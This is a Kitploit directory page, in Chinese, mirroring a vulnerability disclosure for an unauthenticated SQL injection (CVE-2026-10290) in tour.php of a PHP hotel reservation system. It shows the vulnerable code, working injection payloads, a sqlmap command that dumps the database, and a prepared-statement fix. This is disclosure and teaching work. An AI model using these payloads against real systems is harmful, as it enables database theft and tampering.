Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-10290-SQLI | Kitploit
工具/GitHubGitHub/xmyronn/cve-2026-10290-sqli
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育数据库安全
GitHubxmyronn/cve-2026-10290-sqli

CVE-2026-10290-SQLI

查看仓库
2个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Hotel and Tourism Reservation System - tour.php 中未认证的 SQL 注入

漏洞详情

字段详情
标题Hotel and Tourism Reservation System - 通过 tour GET 参数的 SQL 注入
厂商code-projects.org
厂商 URLhttps://code-projects.org/hotel-and-tourism-reservation-in-php-with-source-code/
产品Hotel and Tourism Reservation System
版本1.0
漏洞类型SQL 注入
CWECWE-89
CVSS 评分9.8(严重)
CVSS 向量CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
受影响文件/ht/tour.php
受影响参数tour(GET)
是否需要认证否
是否可远程利用是
研究人员Syed Imad Uddin Alvi

描述

Hotel and Tourism Reservation System 1.0 的 tour.php 中,tour GET 参数存在一个严重的 SQL 注入漏洞。该参数未经任何过滤、预编译语句或输入验证,直接传入原始 SQL 查询。未认证的远程攻击者可以操纵该查询,从而提取、修改或删除数据库中的任何数据。该漏洞已通过使用 sqlmap 进行完整数据库导出得到确认。

tour.php 中的漏洞代码:

root@kitploit:~
if(isset($_GET['tour'])) {
    $tourID = $_GET['tour'];
    $select = $db->query("SELECT * FROM tourism WHERE id = '{$tourID}' ");
    $s = $db->query("SELECT * FROM tourism WHERE id = '{$tourID}' ");
    $data = mysqli_fetch_assoc($s);

$tourID 直接从 $_GET['tour'] 获取,并在未做任何过滤的情况下被插入到 SQL 查询中。


复现步骤

环境准备: 在 XAMPP 上安装 Hotel and Tourism Reservation System 1.0,并通过 http://<target>/ht/ 访问

步骤 1 — 以未认证用户身份访问任意旅游页面:

root@kitploit:~
http://<target>/ht/tour.php?tour=4
Screenshot 2026-05-12 001635

步骤 2 — 注入单引号以破坏 SQL 查询并确认漏洞:

root@kitploit:~
http://<target>/ht/tour.php?tour='

结果: 抛出了致命的 MySQL 错误 — 确认未经过滤的输入到达了 SQL 查询。

Screenshot 2026-05-12 001643

步骤 3 — 使用基于布尔的载荷确认 SQLi:

root@kitploit:~
http://<target>/ht/tour.php?tour=' or 1=1 -- -

结果: 页面正常加载并显示旅游数据 — 布尔注入成功。

Screenshot 2026-05-12 001654

步骤 4 — 使用 sqlmap 导出整个数据库:

root@kitploit:~
sqlmap -r sqli.txt --dump --batch

结果: sqlmap 成功导出 hotel_db 中的所有表,包括 users、rooms、tour_reserves、gallery — 确认数据库已被完全攻陷。

Screenshot 2026-05-12 001722

影响

未认证的远程攻击者可以:

  • 提取数据库中的所有数据,包括用户凭据、电子邮件、电话号码和预订详情
  • 通过提取管理员凭据绕过身份验证
  • 修改或删除任何数据库记录
  • 如果授予了文件权限,还可能通过 INTO OUTFILE 实现远程代码执行

根本原因

tour GET 参数被直接插入到原始 SQL 查询中,完全没有使用预编译语句、参数化查询或输入过滤:

root@kitploit:~
// VULNERABLE
$tourID = $_GET['tour'];
$select = $db->query("SELECT * FROM tourism WHERE id = '{$tourID}' ");

// FIXED — use prepared statements
$stmt = $db->prepare("SELECT * FROM tourism WHERE id = ?");
$stmt->bind_param("i", $_GET['tour']);
$stmt->execute();

参考

  • CWE-89:SQL 命令中使用的特殊元素中和不当
  • OWASP:SQL 注入
  • Hotel and Tourism Reservation System — code-projects.org

发现者

Syed Imad Uddin Alvi — 独立安全研究员

下载工具